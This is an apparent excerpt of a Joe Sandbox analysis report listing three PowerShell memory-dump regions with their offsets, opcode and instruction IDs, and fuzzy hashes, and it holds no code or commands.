• Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID: 4N_^
• API String ID: 0-2516135240
• Opcode ID: cc842aac5aca1c96dcc44c21abd151324b015255127f413332262da38e59559c
• Instruction ID: 168474ca8d349662bd40afc6998f5bd2c38f72aad953fe900558be51d1ffdc92
• Opcode Fuzzy Hash: cc842aac5aca1c96dcc44c21abd151324b015255127f413332262da38e59559c
• Instruction Fuzzy Hash: CEA16257B0E7E25FEB13A76CA8B55E67F60DF57268B0E00F7C0E58B093E904280A8351
Memory Dump Source
• Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33975f8b8025ba681cb8cab4e66d7f517e69cc18b9dce471733dc3301caf7d85
• Instruction ID: 5add56850de8d5f6068b6db993b500e46f9cf23f54f8d338461a094126384d68
• Opcode Fuzzy Hash: 33975f8b8025ba681cb8cab4e66d7f517e69cc18b9dce471733dc3301caf7d85
• Instruction Fuzzy Hash: 86D1C570A18A8D8FEFA8DF28C8557E97BD1FF58310F04426EE85DC7291CB74A9418782
Strings
Memory Dump Source
• Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^
• API String ID: 0-1397233021
• Opcode ID: 6c16de06eb0586fc12cd8ebe1b81b266a43e94446d74b610462f04d51819e51c
• Instruction ID: afaa5a08a22bd0d88f2b9028ec1232ebfcb30e2c9b0b9961f02f195a97f9d5cb
• Opcode Fuzzy Hash: 6c16de06eb0586fc12cd8ebe1b81b266a43e94446d74b610462f04d51819e51c
• Instruction Fuzzy Hash: BE21A293B0E6DA4BE317526C68BA0D53F90EE2626830B02F7D0D8CF1A3FC14994B4251